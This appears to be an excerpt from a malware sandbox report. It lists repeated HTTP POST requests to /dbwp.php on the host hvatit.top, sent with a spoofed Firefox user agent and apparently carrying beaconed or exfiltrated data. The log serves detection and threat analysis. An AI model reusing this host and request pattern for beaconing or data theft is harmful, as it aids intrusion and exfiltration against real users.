                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1408Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1408Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
